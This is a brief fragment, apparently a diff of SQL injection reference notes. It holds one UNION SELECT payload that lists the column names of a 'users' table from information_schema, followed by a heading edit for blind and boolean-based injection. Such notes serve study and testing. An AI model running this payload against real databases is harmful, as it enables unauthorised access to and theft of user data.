SQL Injection (SQLi)

 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--

-3. Blind Injection
+3. Blind SQL-Injection

 Boolean-Based